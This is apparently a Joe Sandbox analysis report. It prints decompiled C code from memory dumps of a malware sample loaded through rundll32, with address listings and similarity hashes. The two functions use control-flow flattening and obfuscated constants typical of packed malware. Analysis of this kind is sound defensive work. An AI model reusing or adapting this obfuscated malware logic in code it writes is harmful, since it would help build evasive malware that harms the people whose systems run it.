                                                                                                                      0x0034e60f
                                                                                                                      0x00000000
                                                                                                                      0x0034e60f
                                                                                                                      0x0034e59a
                                                                                                                      0x00000000
                                                                                                                      0x0034e5a0
                                                                                                                      0x0034e5b8
                                                                                                                      0x0034e5cb
                                                                                                                      0x0034e5d0
                                                                                                                      0x0034e5df
                                                                                                                      0x0034e5e2
                                                                                                                      0x0034e5e3
                                                                                                                      0x0034e5e8
                                                                                                                      0x00000000
                                                                                                                      0x0034e5e8
                                                                                                                      0x0034e59a
                                                                                                                      0x0034e6a5
                                                                                                                      0x0034e6d7
                                                                                                                      0x0034e6dc
                                                                                                                      0x0034e6de
                                                                                                                      0x0034e6e3
                                                                                                                      0x0034e6ef
                                                                                                                      0x00000000
                                                                                                                      0x0034e6ef
                                                                                                                      0x0034e6e5
                                                                                                                      0x00000000
                                                                                                                      0x0034e6e5
                                                                                                                      0x0034e6ad
                                                                                                                      0x0034e70f
                                                                                                                      0x0034e719
                                                                                                                      0x0034e722
                                                                                                                      0x0034e722
                                                                                                                      0x0034e6b5
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0034e6b7
                                                                                                                      0x00000000
                                                                                                                      0x0034e6f4
                                                                                                                      0x0034e6f4
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #G$?=$He
                                                                                                                      • API String ID: 0-2298667298
                                                                                                                      • Opcode ID: b67d283655cdb3b55715e605852151ff48a8f7f654a9859985bf5690d351f105
                                                                                                                      • Instruction ID: 6bab34021a63e9bfea2a1df219302c789efa6a9ae6c8939a112347a9a3a0c06f
                                                                                                                      • Opcode Fuzzy Hash: b67d283655cdb3b55715e605852151ff48a8f7f654a9859985bf5690d351f105
                                                                                                                      • Instruction Fuzzy Hash: 9CC162728083809FC359CF65D48A40BFBE1FBC5358F51892DF59A8A260D7B5E949CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E0034911A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                      				char _v52;
                                                                                                                      				void* _v64;
                                                                                                                      				intOrPtr _v68;
                                                                                                                      				intOrPtr _v92;
                                                                                                                      				intOrPtr _v100;
                                                                                                                      				char _v112;
                                                                                                                      				intOrPtr _v144;
                                                                                                                      				intOrPtr _v148;
                                                                                                                      				char _v156;
                                                                                                                      				char _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
                                                                                                                      				signed int _v204;
                                                                                                                      				signed int _v208;
                                                                                                                      				signed int _v212;
                                                                                                                      				signed int _v216;
                                                                                                                      				signed int _v220;
                                                                                                                      				signed int _v224;
                                                                                                                      				void* _t162;
                                                                                                                      				signed int _t176;
                                                                                                                      				signed int _t184;
                                                                                                                      				void* _t198;
                                                                                                                      				void* _t200;
                                                                                                                      				void* _t202;
                                                                                                                      				intOrPtr _t207;
                                                                                                                      				signed int _t231;
                                                                                                                      				signed int _t232;
                                                                                                                      				signed int _t233;
                                                                                                                      				void* _t235;
                                                                                                                      				void* _t236;
                                                                                                                      				void* _t238;
                                                                                                                      
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0034CF25(_t162);
                                                                                                                      				_v68 = 0x6e7241;
                                                                                                                      				_t236 = _t235 + 0x10;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t198 = 0;
                                                                                                                      				_t200 = 0x513154f;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t231 = 0x5b;
                                                                                                                      				asm("stosd");
                                                                                                                      				_v208 = 0x6dc976;
                                                                                                                      				_v208 = _v208 + 0xffff97e7;
                                                                                                                      				_v208 = _v208 << 0xf;
                                                                                                                      				_v208 = _v208 + 0xffff3ee4;
                                                                                                                      				_v208 = _v208 ^ 0xb0a037f9;
                                                                                                                      				_v216 = 0xefa27a;
                                                                                                                      				_v216 = _v216 * 0x2d;
                                                                                                                      				_v216 = _v216 << 0xe;
                                                                                                                      				_v216 = _v216 + 0x5c30;
                                                                                                                      				_v216 = _v216 ^ 0xe3d2b40e;
                                                                                                                      				_v192 = 0xd4fef0;
                                                                                                                      				_v192 = _v192 / _t231;
                                                                                                                      				_v192 = _v192 << 9;
                                                                                                                      				_v192 = _v192 ^ 0x04a09c26;
                                                                                                                      				_v172 = 0xfabcfe;
                                                                                                                      				_v172 = _v172 + 0xadb7;
                                                                                                                      				_v172 = _v172 ^ 0x00f6fe01;
                                                                                                                      				_v224 = 0xb5a285;
                                                                                                                      				_t232 = 0x43;
                                                                                                                      				_v224 = _v224 * 0x7a;
                                                                                                                      				_v224 = _v224 >> 1;
                                                                                                                      				_v224 = _v224 | 0x4641179d;
                                                                                                                      				_v224 = _v224 ^ 0x6f41a140;
                                                                                                                      				_v212 = 0x80e1bd;
                                                                                                                      				_v212 = _v212 / _t232;
                                                                                                                      				_v212 = _v212 << 9;
                                                                                                                      				_v212 = _v212 >> 0xc;
                                                                                                                      				_v212 = _v212 ^ 0x0005f6ff;
                                                                                                                      				_v220 = 0x3f6ee7;
                                                                                                                      				_v220 = _v220 >> 5;
                                                                                                                      				_v220 = _v220 << 0xf;
                                                                                                                      				_v220 = _v220 | 0x5ccf7ed2;
                                                                                                                      				_v220 = _v220 ^ 0xfdf08ccb;
                                                                                                                      				_v188 = 0x96b178;
                                                                                                                      				_v188 = _v188 * 0x33;
                                                                                                                      				_v188 = _v188 << 7;
                                                                                                                      				_v188 = _v188 ^ 0x02ac94c8;
                                                                                                                      				_v196 = 0x862d42;
                                                                                                                      				_v196 = _v196 | 0x17619c21;
                                                                                                                      				_v196 = _v196 ^ 0x73c665d7;
                                                                                                                      				_v196 = _v196 ^ 0x642dc428;
                                                                                                                      				_v176 = 0xd9c085;
                                                                                                                      				_v176 = _v176 | 0xddbc98a5;
                                                                                                                      				_v176 = _v176 ^ 0xddfc0835;
                                                                                                                      				_v180 = 0xc6bbdd;
                                                                                                                      				_v180 = _v180 * 0x34;
                                                                                                                      				_v180 = _v180 ^ 0x2850aa5e;
                                                                                                                      				_v168 = 0x548f7e;
                                                                                                                      				_v168 = _v168 << 2;
                                                                                                                      				_v168 = _v168 ^ 0x015ffca1;
                                                                                                                      				_v204 = 0x6ca805;
                                                                                                                      				_v204 = _v204 + 0x3ad1;
                                                                                                                      				_v204 = _v204 * 0x44;
                                                                                                                      				_v204 = _v204 ^ 0x1ce18dde;
                                                                                                                      				_v184 = 0x9ecbae;
                                                                                                                      				_v184 = _v184 << 5;
                                                                                                                      				_v184 = _v184 ^ 0x13d028d8;
                                                                                                                      				_t233 = _v184;
                                                                                                                      				_v200 = 0xbd8de1;
                                                                                                                      				_v200 = _v200 + 0xffffb408;
                                                                                                                      				_v200 = _v200 | 0x119192b9;
                                                                                                                      				_v200 = _v200 ^ 0x11b45be6;
                                                                                                                      				while(1) {
                                                                                                                      					_t238 = _t200 - 0x8a8a415;
                                                                                                                      					if(_t238 <= 0) {
                                                                                                                      					}
                                                                                                                      					L2:
                                                                                                                      					if(_t238 == 0) {
                                                                                                                      						_t176 = E0034CA43( &_v164, _v196, _v176, _v180,  &_v156, _v168);
                                                                                                                      						_t236 = _t236 + 0x10;
                                                                                                                      						asm("sbb ecx, ecx");
                                                                                                                      						_t200 = ( ~_t176 & 0x03566572) + 0x6fcaad9;
                                                                                                                      						continue;
                                                                                                                      						do {
                                                                                                                      							while(1) {
                                                                                                                      								_t238 = _t200 - 0x8a8a415;
                                                                                                                      								if(_t238 <= 0) {
                                                                                                                      								}
                                                                                                                      								goto L2;
                                                                                                                      							}
                                                                                                                      							L45:
                                                                                                                      							__eflags = _t200 - 0x409adf;
                                                                                                                      						} while (__eflags != 0);
                                                                                                                      						L46:
                                                                                                                      						return _t198;
                                                                                                                      					}
                                                                                                                      					if(_t200 == 0x1cefc96) {
                                                                                                                      						__eflags = _v148 - 1;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E0034472E( &_v112);
                                                                                                                      							L16:
                                                                                                                      							_t200 = 0xdce0ab1;
                                                                                                                      							while(1) {
                                                                                                                      								_t238 = _t200 - 0x8a8a415;
                                                                                                                      								if(_t238 <= 0) {
                                                                                                                      								}
                                                                                                                      								goto L2;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						_t200 = 0x6447723;
                                                                                                                      						while(1) {
                                                                                                                      							_t238 = _t200 - 0x8a8a415;
                                                                                                                      							if(_t238 <= 0) {
                                                                                                                      							}
                                                                                                                      							goto L25;
                                                                                                                      						}
                                                                                                                      						goto L2;
                                                                                                                      					}
                                                                                                                      					if(_t200 == 0x26bd5bb) {
                                                                                                                      						__eflags = _v148 - 6;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E0035A429( &_v112);
                                                                                                                      							goto L16;
                                                                                                                      						}
                                                                                                                      						_t200 = 0xcc2cd30;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t200 == 0x513154f) {
                                                                                                                      						E003564C5(_v208, _v216, _v192, _v172, _a4,  &_v52);
                                                                                                                      						_t236 = _t236 + 0x10;
                                                                                                                      						_t200 = 0x7b50d2c;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t200 == 0x6447723) {
                                                                                                                      						__eflags = _v148 - 2;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E00355040( &_v112, _t233);
                                                                                                                      							goto L16;
                                                                                                                      						}
                                                                                                                      						_t200 = 0x92d00b6;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t200 == 0x6fcaad9) {
                                                                                                                      						_t184 = E0035B9B1(_v224, _v212, __eflags,  &_v164, _v220,  &_v52, _v188);
                                                                                                                      						_t236 = _t236 + 0x10;
                                                                                                                      						__eflags = _t184;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							goto L46;
                                                                                                                      						}
                                                                                                                      						L12:
                                                                                                                      						_t200 = 0x8a8a415;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t200 != 0x7b50d2c) {
                                                                                                                      						goto L45;
                                                                                                                      					}
                                                                                                                      					E00346A1F(0);
                                                                                                                      					L10:
                                                                                                                      					_t200 = 0x6fcaad9;
                                                                                                                      					continue;
                                                                                                                      					L25:
                                                                                                                      					__eflags = _t200 - 0x92d00b6;
                                                                                                                      					if(_t200 == 0x92d00b6) {
                                                                                                                      						__eflags = _v148 - 3;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E003488F4( &_v112);
                                                                                                                      							_t200 = 0xdce0ab1;
                                                                                                                      							goto L45;
                                                                                                                      						}
                                                                                                                      						_t200 = 0xe60179d;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					__eflags = _t200 - 0xa53104b;
                                                                                                                      					if(_t200 == 0xa53104b) {
                                                                                                                      						_push(_t200);
                                                                                                                      						_push(_t200);
                                                                                                                      						_t202 = 0x44;
                                                                                                                      						_t233 = E00353512(_t202);
                                                                                                                      						__eflags = _t233;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							goto L12;
                                                                                                                      						}
                                                                                                                      						_t200 = 0x1cefc96;
                                                                                                                      						 *((intOrPtr*)(_t233 + 0x20)) = _v100;
                                                                                                                      						 *((intOrPtr*)(_t233 + 0x40)) = _v144;
                                                                                                                      						 *((intOrPtr*)(_t233 + 0x34)) = _v92;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					__eflags = _t200 - 0xc419b15;
                                                                                                                      					if(_t200 == 0xc419b15) {
                                                                                                                      						__eflags = _v148 - 5;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E00350946( &_v112, _t233);
                                                                                                                      							goto L16;
                                                                                                                      						}
                                                                                                                      						_t200 = 0x26bd5bb;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					__eflags = _t200 - 0xcc2cd30;
                                                                                                                      					if(_t200 == 0xcc2cd30) {
                                                                                                                      						__eflags = _v148 - 7;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E00347B82( &_v112);
                                                                                                                      						}
                                                                                                                      						goto L16;
                                                                                                                      					}
                                                                                                                      					__eflags = _t200 - 0xdce0ab1;
                                                                                                                      					if(__eflags == 0) {
                                                                                                                      						_t207 =  *0x365c94; // 0x0
                                                                                                                      						_t198 = _t198 + 1;
                                                                                                                      						 *_t233 =  *(_t207 + 0x230);
                                                                                                                      						 *(_t207 + 0x230) = _t233;
                                                                                                                      						goto L10;
                                                                                                                      					}
                                                                                                                      					__eflags = _t200 - 0xe60179d;
                                                                                                                      					if(_t200 != 0xe60179d) {
                                                                                                                      						goto L45;
                                                                                                                      					}
                                                                                                                      					__eflags = _v148 - 4;
                                                                                                                      					if(__eflags == 0) {
                                                                                                                      						E00342FA1( &_v112);
                                                                                                                      						goto L16;
                                                                                                                      					}
                                                                                                                      					_t200 = 0xc419b15;
                                                                                                                      				}
                                                                                                                      			}
                                                                                                                      0x00349457
                                                                                                                      0x003493e8
                                                                                                                      0x003493e8
                                                                                                                      0x00349339
                                                                                                                      0x00349339
                                                                                                                      0x0034933b
                                                                                                                      0x0034933b
                                                                                                                      0x00000000
                                                                                                                      0x0034933b
                                                                                                                      0x00349339
                                                                                                                      0x00349446
                                                                                                                      0x00349339
                                                                                                                      0x00349339
                                                                                                                      0x0034933b
                                                                                                                      0x0034933b
                                                                                                                      0x00000000
                                                                                                                      0x0034933b
                                                                                                                      0x00000000
                                                                                                                      0x00349339
                                                                                                                      0x00349359
                                                                                                                      0x00349420
                                                                                                                      0x00349425
                                                                                                                      0x00349438
                                                                                                                      0x00000000
                                                                                                                      0x00349438
                                                                                                                      0x00349427
                                                                                                                      0x00000000
                                                                                                                      0x00349427
                                                                                                                      0x00349365
                                                                                                                      0x0034940e
                                                                                                                      0x00349413
                                                                                                                      0x00349416
                                                                                                                      0x00000000
                                                                                                                      0x00349416
                                                                                                                      0x00349371
                                                                                                                      0x003493c9
                                                                                                                      0x003493ce
                                                                                                                      0x003493e3
                                                                                                                      0x00000000
                                                                                                                      0x003493e3
                                                                                                                      0x003493d0
                                                                                                                      0x00000000
                                                                                                                      0x003493d0
                                                                                                                      0x00349379
                                                                                                                      0x003493b2
                                                                                                                      0x003493b7
                                                                                                                      0x003493ba
                                                                                                                      0x003493bc
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x003493c2
                                                                                                                      0x003493c2
                                                                                                                      0x00000000
                                                                                                                      0x003493c2
                                                                                                                      0x00349381
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00349389
                                                                                                                      0x0034938e
                                                                                                                      0x0034938e
                                                                                                                      0x00000000
                                                                                                                      0x00349496
                                                                                                                      0x00349496
                                                                                                                      0x0034949c
                                                                                                                      0x00349591
                                                                                                                      0x00349596
                                                                                                                      0x003495a9
                                                                                                                      0x003495ae
                                                                                                                      0x00000000
                                                                                                                      0x003495ae
                                                                                                                      0x00349598
                                                                                                                      0x00000000
                                                                                                                      0x00349598
                                                                                                                      0x003494a2
                                                                                                                      0x003494a8
                                                                                                                      0x00349556
                                                                                                                      0x00349557
                                                                                                                      0x0034955a
                                                                                                                      0x00349560
                                                                                                                      0x00349564
                                                                                                                      0x00349566
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00349573
                                                                                                                      0x00349578
                                                                                                                      0x0034957f
                                                                                                                      0x00349589
                                                                                                                      0x00000000
                                                                                                                      0x00349589
                                                                                                                      0x003494ae
                                                                                                                      0x003494b4
                                                                                                                      0x00349526
                                                                                                                      0x0034952b
                                                                                                                      0x00349540
                                                                                                                      0x00000000
                                                                                                                      0x00349540
                                                                                                                      0x0034952d
                                                                                                                      0x00000000
                                                                                                                      0x0034952d
                                                                                                                      0x003494b6
                                                                                                                      0x003494bc
                                                                                                                      0x0034950a
                                                                                                                      0x0034950f
                                                                                                                      0x0034951c
                                                                                                                      0x0034951c
                                                                                                                      0x00000000
                                                                                                                      0x0034950f
                                                                                                                      0x003494be
                                                                                                                      0x003494c0
                                                                                                                      0x003494f0
                                                                                                                      0x003494f6
                                                                                                                      0x003494fd
                                                                                                                      0x003494ff
                                                                                                                      0x00000000
                                                                                                                      0x003494ff
                                                                                                                      0x003494c2
                                                                                                                      0x003494c8
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x003494ce
                                                                                                                      0x003494d3
                                                                                                                      0x003494e6
                                                                                                                      0x00000000
                                                                                                                      0x003494e6
                                                                                                                      0x003494d5
                                                                                                                      0x003494d5

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0\$Arn$n?
                                                                                                                      • API String ID: 0-1422779782
                                                                                                                      • Opcode ID: c7451a6f284634e3b54f9505b6974c85a3da567d5dad4d9d225e0647660ca84d
                                                                                                                      • Instruction ID: 9579c9d9b30ad86d4bb77e3fb2b4317e02c408ca9a46e12d8870d877c1ac9832
                                                                                                                      • Opcode Fuzzy Hash: c7451a6f284634e3b54f9505b6974c85a3da567d5dad4d9d225e0647660ca84d
                                                                                                                      • Instruction Fuzzy Hash: 5BB18870508381DFC76ACF24C49962FBBE5FBC5348F540A1EF6869A6A0D771A948CB43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0034BD0F(intOrPtr* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                      				char _v16;
                                                                                                                      				intOrPtr _v48;
                                                                                                                      				char _v52;
                                                                                                                      				char _v68;
                                                                                                                      				char _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				char _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				void* _t208;
                                                                                                                      				signed int _t226;
                                                                                                                      				char* _t228;
                                                                                                                      				signed int _t229;
                                                                                                                      				void* _t231;
                                                                                                                      				signed int _t234;
                                                                                                                      				intOrPtr _t242;
                                                                                                                      				intOrPtr* _t247;
                                                                                                                      				void* _t249;
                                                                                                                      				intOrPtr _t250;
                                                                                                                      				void* _t289;
                                                                                                                      				intOrPtr* _t291;
                                                                                                                      				signed int _t292;
                                                                                                                      				signed int _t293;
                                                                                                                      				signed int _t294;
                                                                                                                      				signed int _t295;
                                                                                                                      				signed int _t296;
                                                                                                                      				signed int _t297;
                                                                                                                      				signed int _t298;
                                                                                                                      				signed int* _t301;
                                                                                                                      
                                                                                                                      				_t291 = _a4;
                                                                                                                      				_t247 = __ecx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_t291);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0034CF25(_t208);
                                                                                                                      				_v132 = 0x7182e5;
                                                                                                                      				_t301 =  &(( &_v156)[4]);
                                                                                                                      				_v132 = _v132 + 0x26fa;
                                                                                                                      				_t289 = 0;
                                                                                                                      				_t249 = 0xa47caa1;
                                                                                                                      				_t292 = 0x79;
                                                                                                                      				_v132 = _v132 / _t292;
                                                                                                                      				_t293 = 0x16;
                                                                                                                      				_v132 = _v132 / _t293;
                                                                                                                      				_v132 = _v132 ^ 0x00000aee;
                                                                                                                      				_v140 = 0x29ca9c;
                                                                                                                      				_v140 = _v140 + 0x24a5;
                                                                                                                      				_v140 = _v140 << 5;
                                                                                                                      				_v140 = _v140 + 0xffff55cc;
                                                                                                                      				_v140 = _v140 ^ 0x053d3dfc;
                                                                                                                      				_v136 = 0x4d5d35;
                                                                                                                      				_v136 = _v136 | 0x2dd38e58;
                                                                                                                      				_v136 = _v136 + 0xffffc96a;
                                                                                                                      				_v136 = _v136 | 0xcd817148;
                                                                                                                      				_v136 = _v136 ^ 0xedde351d;
                                                                                                                      				_v152 = 0x709b91;
                                                                                                                      				_t294 = 0x24;
                                                                                                                      				_v152 = _v152 / _t294;
                                                                                                                      				_v152 = _v152 | 0xc56f7625;
                                                                                                                      				_v152 = _v152 << 6;
                                                                                                                      				_v152 = _v152 ^ 0x5bd1c7f0;
                                                                                                                      				_v144 = 0x2195b1;
                                                                                                                      				_v144 = _v144 | 0x0c2b25b9;
                                                                                                                      				_v144 = _v144 << 8;
                                                                                                                      				_v144 = _v144 | 0x32a70c97;
                                                                                                                      				_v144 = _v144 ^ 0x3bb2e9a3;
                                                                                                                      				_v120 = 0x3a67b3;
                                                                                                                      				_v120 = _v120 + 0xffff86f2;
                                                                                                                      				_v120 = _v120 + 0xf6d6;
                                                                                                                      				_v120 = _v120 ^ 0x00358b42;
                                                                                                                      				_v108 = 0x732c66;
                                                                                                                      				_t68 =  &_v108; // 0x732c66
                                                                                                                      				_t295 = 0x35;
                                                                                                                      				_v108 =  *_t68 / _t295;
                                                                                                                      				_v108 = _v108 << 0xb;
                                                                                                                      				_v108 = _v108 ^ 0x11669525;
                                                                                                                      				_v156 = 0x38089d;
                                                                                                                      				_v156 = _v156 ^ 0x13a0f5b7;
                                                                                                                      				_v156 = _v156 | 0xc9f1c7ca;
                                                                                                                      				_v156 = _v156 << 0xf;
                                                                                                                      				_v156 = _v156 ^ 0xfffe1365;
                                                                                                                      				_v128 = 0x743938;
                                                                                                                      				_v128 = _v128 ^ 0xec4d11e9;
                                                                                                                      				_v128 = _v128 | 0xa250e655;
                                                                                                                      				_v128 = _v128 * 0x41;
                                                                                                                      				_v128 = _v128 ^ 0x8cf42415;
                                                                                                                      				_v100 = 0x6d926d;
                                                                                                                      				_t296 = 0x34;
                                                                                                                      				_v100 = _v100 / _t296;
                                                                                                                      				_v100 = _v100 ^ 0x000eb1c4;
                                                                                                                      				_v116 = 0xefa621;
                                                                                                                      				_v116 = _v116 + 0xffff82bb;
                                                                                                                      				_t297 = 0x3d;
                                                                                                                      				_v116 = _v116 * 0x32;
                                                                                                                      				_v116 = _v116 ^ 0x2eb07dcc;
                                                                                                                      				_v88 = 0x5b377;
                                                                                                                      				_v88 = _v88 + 0x8d9;
                                                                                                                      				_v88 = _v88 ^ 0x00067740;
                                                                                                                      				_v112 = 0x4d19ae;
                                                                                                                      				_v112 = _v112 ^ 0x630c5599;
                                                                                                                      				_v112 = _v112 ^ 0xe5b09bfb;
                                                                                                                      				_v112 = _v112 ^ 0x86f4ef46;
                                                                                                                      				_v148 = 0x4966c6;
                                                                                                                      				_v148 = _v148 / _t297;
                                                                                                                      				_v148 = _v148 << 1;
                                                                                                                      				_v148 = _v148 ^ 0x19f6490a;
                                                                                                                      				_v148 = _v148 ^ 0x19fea643;
                                                                                                                      				_v104 = 0x4e28a7;
                                                                                                                      				_v104 = _v104 ^ 0x0c2039e4;
                                                                                                                      				_t298 = 0x43;
                                                                                                                      				_v104 = _v104 / _t298;
                                                                                                                      				_v104 = _v104 ^ 0x002b1fa2;
                                                                                                                      				_v96 = 0xfd59a6;
                                                                                                                      				_v96 = _v96 ^ 0x1da99ba6;
                                                                                                                      				_v96 = _v96 ^ 0x1d58c7ea;
                                                                                                                      				_v92 = 0x8125dc;
                                                                                                                      				_v92 = _v92 << 7;
                                                                                                                      				_v92 = _v92 ^ 0x409d3f45;
                                                                                                                      				_v124 = 0x45818f;
                                                                                                                      				_v124 = _v124 ^ 0x2c821393;
                                                                                                                      				_v124 = _v124 << 0xc;
                                                                                                                      				_v124 = _v124 + 0x7cf7;
                                                                                                                      				_v124 = _v124 ^ 0x792e1e67;
                                                                                                                      				do {
                                                                                                                      					while(_t249 != 0x4baccf8) {
                                                                                                                      						if(_t249 == 0x7c30f3d) {
                                                                                                                      							_t231 = E003564F1( &_v52, _v156,  &_v16, _v128);
                                                                                                                      							_pop(_t254);
                                                                                                                      							if(_t231 != 0) {
                                                                                                                      								_push(_t254);
                                                                                                                      								_t242 = E00353512(_v48);
                                                                                                                      								 *_t291 = _t242;
                                                                                                                      								if(_t242 != 0) {
                                                                                                                      									E0035FD29(_v52, _v112,  *_t291, _v148, _v48);
                                                                                                                      									_t301 =  &(_t301[3]);
                                                                                                                      									 *((intOrPtr*)(_t291 + 4)) = _v48;
                                                                                                                      									_t289 = 1;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							_t249 = 0xf7122fc;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t249 == 0x9cf6742) {
                                                                                                                      							_t234 = E003604DE(_v144, _v120,  &_v76,  &_v68, _v108);
                                                                                                                      							_t301 =  &(_t301[3]);
                                                                                                                      							asm("sbb ecx, ecx");
                                                                                                                      							_t249 = ( ~_t234 & 0xf851ec41) + 0xf7122fc;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t249 == 0xa47caa1) {
                                                                                                                      							_t249 = 0x4baccf8;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t249 == 0xbfbcb36) {
                                                                                                                      							if(E0035CC89( &_v76,  &_v84, _v152) == 0) {
                                                                                                                      								L8:
                                                                                                                      								return _t289;
                                                                                                                      							}
                                                                                                                      							_t249 = 0x9cf6742;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t249 != 0xf7122fc) {
                                                                                                                      							goto L25;
                                                                                                                      						}
                                                                                                                      						E003468DE(_v104, _v96, _v92, _v124, _v76);
                                                                                                                      						goto L8;
                                                                                                                      					}
                                                                                                                      					_t226 =  *((intOrPtr*)(_t247 + 4));
                                                                                                                      					_t250 =  *_t247;
                                                                                                                      					_v80 = _t226;
                                                                                                                      					_v84 = _t250;
                                                                                                                      					_t228 = _t226 - 1 + _t250;
                                                                                                                      					while(_t228 > _t250) {
                                                                                                                      						if( *_t228 == 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						_t228 = _t228 - 1;
                                                                                                                      					}
                                                                                                                      					_t229 = _t228 - _t250;
                                                                                                                      					_v80 = _t229;
                                                                                                                      					if(_t229 == 0) {
                                                                                                                      						L24:
                                                                                                                      						_t249 = 0xbfbcb36;
                                                                                                                      						goto L25;
                                                                                                                      					}
                                                                                                                      					while(_v80 % _v140 != _v132) {
                                                                                                                      						_t206 =  &_v80;
                                                                                                                      						 *_t206 = _v80 - 1;
                                                                                                                      						if( *_t206 != 0) {
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						goto L24;
                                                                                                                      					}
                                                                                                                      					goto L24;
                                                                                                                      					L25:
                                                                                                                      				} while (_t249 != 0x4e0187e);
                                                                                                                      				goto L8;
                                                                                                                      			}
                                                                                                                      0x0034c0ee
                                                                                                                      0x0034c0f1
                                                                                                                      0x0034c0f1
                                                                                                                      0x0034c0c6
                                                                                                                      0x0034c0f2
                                                                                                                      0x00000000
                                                                                                                      0x0034c0f2
                                                                                                                      0x0034bfe0
                                                                                                                      0x0034c069
                                                                                                                      0x0034c06e
                                                                                                                      0x0034c075
                                                                                                                      0x0034c07d
                                                                                                                      0x00000000
                                                                                                                      0x0034c07d
                                                                                                                      0x0034bfe8
                                                                                                                      0x0034c049
                                                                                                                      0x00000000
                                                                                                                      0x0034c049
                                                                                                                      0x0034bff0
                                                                                                                      0x0034c03d
                                                                                                                      0x0034c016
                                                                                                                      0x0034c022
                                                                                                                      0x0034c022
                                                                                                                      0x0034c03f
                                                                                                                      0x00000000
                                                                                                                      0x0034c03f
                                                                                                                      0x0034bff4
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0034c00e
                                                                                                                      0x00000000
                                                                                                                      0x0034c013
                                                                                                                      0x0034c0f9
                                                                                                                      0x0034c0fc
                                                                                                                      0x0034c0fe
                                                                                                                      0x0034c103
                                                                                                                      0x0034c107
                                                                                                                      0x0034c111
                                                                                                                      0x0034c10e
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0034c110
                                                                                                                      0x0034c110
                                                                                                                      0x0034c115
                                                                                                                      0x0034c117
